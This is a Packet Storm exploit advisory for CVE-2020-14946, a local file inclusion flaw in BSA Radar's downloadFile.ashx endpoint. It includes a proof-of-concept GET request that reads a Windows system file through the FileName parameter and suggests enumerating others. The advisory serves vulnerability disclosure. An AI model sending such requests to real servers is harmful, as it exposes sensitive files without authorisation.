exploit the possibilities

BSA Radar 1.6.7234.24750 Local File Inclusion

BSA Radar 1.6.7234.24750 Local File Inclusion
Posted Jul 14, 2020
Authored by William Summerhill

BSA Radar version 1.6.7234.24750 suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
advisories | CVE-2020-14946
MD5 | 4f8724486f85bed5c6ebc292e5dde54d

BSA Radar 1.6.7234.24750 Local File Inclusion

Change Mirror Download
# Exploit title: BSA Radar 1.6.7234.24750 - Local File Inclusion
# Date: 2020-07-08
# Exploit Author: William Summerhill
# Vendor homepage: https://www.globalradar.com/
# Version: BSA Radar - Version 1.6.7234.24750 and lower
# CVE-2020-14946 - Local File Inclusion

# Description: The Administrator section of the Surveillance module in Global RADAR - BSA Radar 1.6.7234.X
# and lower allows users to download transaction files. When downloading the files,
# a user is able to view local files on the web server by manipulating the FileName
# and FilePath parameters in the URL, or while using a proxy. This vulnerability could
# be used to view local sensitive files or configuration files on the backend server.

Vulnerable endpoint: /UC/downloadFile.ashx

The current user is required to have valid privileges to send requests to the target vulnerable endpoint.

Proof of Concept:

HTTP Request PoC:

VALID REQUEST:
GET /UC/downloadFile.ashx?ID=XXXX&FileName=SOMEFILE.TXT&UploadStyle=1&UploadStyle=1&UploadSource=6

LFI EXPLOIT REQUEST:
GET /UC/downloadFile.ashx?ID=XXXX&FileName=C:\Windows\debug\NetSetup.log&UploadStyle=1&UploadSource=6

The entire LFI path can be injected into the "FileName" parameter in order to enumerate existing files on the server. Other LFI files can be tested (such as the Windows hosts file) for further verification and disclosures.

Tested on: Windows

CVE: CVE-2020-14946

Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14946
Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    11 Files
  • 12
    Aug 12th
    11 Files
  • 13
    Aug 13th
    17 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close